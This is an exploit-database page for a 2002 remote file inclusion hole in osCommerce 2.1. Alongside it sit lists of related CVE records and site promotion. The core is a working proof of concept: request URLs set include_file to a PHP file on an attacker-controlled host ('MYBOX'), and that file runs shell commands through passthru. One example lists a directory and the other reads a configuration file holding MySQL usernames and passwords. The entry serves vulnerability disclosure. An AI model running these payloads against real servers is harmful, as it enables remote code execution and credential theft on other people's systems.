Lucene search
+L

osCommerce 2.1 - Remote File Inclusion

🗓️ 16 Jun 2002 00:00:00Reported by Tim VandermeerchType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 35 Views

osCommerce 2.1 allows remote file inclusion, enabling execution of PHP code by attackers.

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2002-1991
14 Jul 200504:00
cve
cve
CVE
CVE-2002-2019
14 Jul 200504:00
cve
cvelist
Cvelist
CVE-2002-1991
14 Jul 200504:00
cvelist
cvelist
Cvelist
CVE-2002-2019
14 Jul 200504:00
cvelist
euvd
EUVD
EUVD-2002-1970
7 Oct 202500:30
euvd
euvd
EUVD
EUVD-2002-1998
7 Oct 202500:30
euvd
nvd
NVD
CVE-2002-1991
31 Dec 200205:00
nvd
nvd
NVD
CVE-2002-2019
31 Dec 200205:00
nvd
redhatcve
RedhatCVE
CVE-2002-2019
21 May 202520:29
redhatcve
source: https://www.securityfocus.com/bid/5037/info

osCommerce is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. If the remote file is a PHP script, this may allow for execution of attacker-supplied PHP code with the privileges of the webserver.

-------- Example 1 --------
http://SERVER/catalog/inludes/include_once.php?
include_file=http://MYBOX/a.php

--- a.php ---
<? passthru("/bin/ls")?>
-------------
Output: dir listing of the current dierctory
---------------------------

-------- Example 2 --------
http://SERVER/catalog/inludes/include_once.php?
include_file=http://MYBOX/b.php

--- b.php ---
<? passthru("/bin/cat application_top.php")?>
-------------
Output: outputs the application_top.php file wich includes MySQL username,
password, etc.

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Sep 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.07456
35